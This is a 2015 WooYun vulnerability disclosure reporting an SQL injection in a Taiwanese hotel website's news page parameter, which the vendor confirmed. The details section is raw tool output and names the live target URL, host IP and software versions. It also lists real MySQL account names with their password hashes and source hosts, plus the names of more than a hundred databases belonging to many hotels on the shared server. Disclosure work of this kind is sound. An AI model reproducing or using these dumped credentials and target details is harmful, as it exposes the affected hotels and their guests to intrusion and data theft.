当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100376

漏洞标题:寒軒國際大飯店SQL注入

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 龍 、

提交时间:2015-03-10 19:03

修复时间:2015-04-24 19:04

公开时间:2015-04-24 19:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-10: 细节已通知厂商并且等待厂商处理中
2015-03-12: 厂商已经确认,细节仅向厂商公开
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-24: 细节向公众公开

简要描述:

 寒軒國際大飯店矗立於高雄市政府對面,四維林蔭大道上,是南台灣最具規模的五星商務觀光飯店。42樓美觀建築設計、挑高明亮的景觀玻璃,風格獨具。完善硬體設備與無微不至的溫馨服務,滿足商務人士及渡假旅客的多重需求。

详细说明:

Target: 		http://www.han-hsien.com.tw/hhih/news_detail.php?uid=1548
Host IP:		60.251.16.136
Web Server: 	Apache/2.2.24 (FreeBSD) PHP/5.2.5 with Suhosin-Patch DAV/2
Powered-by: 	PHP/5.2.5
DB Server: 	MySQL error based
Resp. Time(avg):	85 ms
Current User: 	bb@localhost
Sql Version: 	5.1.23-rc
Current DB: 	LINDEN_UTF8
System User: 	bb@localhost
Host Name: 	w0.surehigh.com.tw
Installation dir: 	/usr/local/
DB User & Pass: 	root::localhost
Compile OS: 	portbld-freebsd7.0
		root::www.surehigh.com.tw
		::localhost
		::www.surehigh.com.tw
		apache:15b1e04a3bd33ec5:localhost
		bb:13d4586f44131556:localhost
		postfix:3ecf3e4f55dd846f:localhost
		amosho:50bd74cd2fd8b4c2:localhost
		virtual_mail:11f66ebd0d34cb00:172.16.1.17
		admin::localhost
		postfixadmin:0b553b00631b84ae:localhost
		mife:448ac6952065e915:localhost
		mife:448ac6952065e915:219.81.130.38
		mife:448ac6952065e915:surehigh.com.tw
		fltravel:4ffa053b75e0e2bd:localhost
		virtual_mail:11f66ebd0d34cb00:61.61.138.16
		virtual_mail:4b5408bd3c605ca0:localhost
		yam_hercafe:132f499b608efe2a:localhost
		yam_hercafe:132f499b608efe2a:211.72.254.85
		capu:100d5f28438f83ca:localhost
		duncan:0af5903e6b656556:localhost
		mife:448ac6952065e915:220.130.133.196
		mife:448ac6952065e915:220.130.133.197
		mife:448ac6952065e915:220.130.133.198
		ez889:4541bf2217f4a714:localhost
		edison:773359240eb9a1d9:localhost
		someuser::somehost
		wayne:*6F97312A40AC7A963ADDC0FEE36941C0D9815AB0:localhost
		iron:1bcc3b5c58ac726f:210.202.81.67
		iron:*51F54C2E21F48D87844A4DD6B6A753B07FDD6EF7:localhost
Data Bases: 	information_schema
		AGENT_DEMO
		ATAMI
		AZUREHOTEL
		CAESAR
		CAESARPARK
		CHIHAN
		CHINGSHEUI
		COCO
		CROWNE
		DAAN
		DEBAO
		DEMO
		DHMC_MOBILE
		DREAMTOWN
		EDISON
		ETAIWAN
		EZ889
		EZHOTEL
		EZHotelJack
		FISHERHOTEL
		FORTEHOTEL
		GINKGO
		GOSHEN
		GRACEFUL
		GRANDFORWARD
		GREENHOTEL
		GRHOLIDAY
		GRHOLIDAY_CART
		HANDSOMEHOTEL
		HEFONG
		HEFONGVILLA
		HEFONG_CHAHSI
		HEFONG_KELLY
		HIBISCUS
		HOLLAND
		HOTELMASTER
		HOTELOCEAN
		HOTEL_ASIA
		HOTEL_BANKS_MOBILE
		HOTHOTEL
		HOYARESORT
		HotelMaster
		IMAGE
		IMAGE_GOLD
		JIHOTEL
		KAVALAN
		KENTINGCAESAR
		KENTINGCAESAR2
		KTCHATEAU
		KYOTO
		LEADER
		LINDEN
		LINDEN_UTF8
		LISHIN
		MARSHAL
		MEDIA
		MINGAO
		MIYI
		MRTHOTEL
		NONGANHOTEL
		OFFICIALSITE_DEMO
		PACIFICSPA
		PLCRESORT_DEMO
		PLCRESORT_WEB
		RETAIL
		ROYALJETWAY
		ROYAL_CHAHSI
		ROYAL_TAIPEI
		SAAJUST
		SAUALKEH
		SEALIFE
		SHANGRILA
		SHANGRILA_2
		SHANGRILA_EN
		SHERWOOD
		SHINEYOU
		SPRINGRESORT
		STAR
		SVRESORT
		TAIAN
		TAIWAN_GO_FORM
		TAROKO
		TAYIH
		TEMPUS
		TICKETGO
		TIENLAI
		TOURBUS
		TWAMD
		UNIQUEHOLIDAY
		VICTORIA
		VICTORIA2
		WELFARE
		XIAYUN
		XIMEN
		YAM
		YIYUAN
		a_shan
		airbus
		alacarte
		bendon
		capu
		duncan
		duncan2
		fltravel
		kters
		lost+found
		mysql
		postfix
		sales
		taikwucomtw
		virtual_mail
		xiediving


QQ图片20150309194721.png


漏洞证明:

QQ图片20150309194721.png


裤真多,没一一看,

修复方案:

版权声明:转载请注明来源 龍 、@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-12 10:17

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评论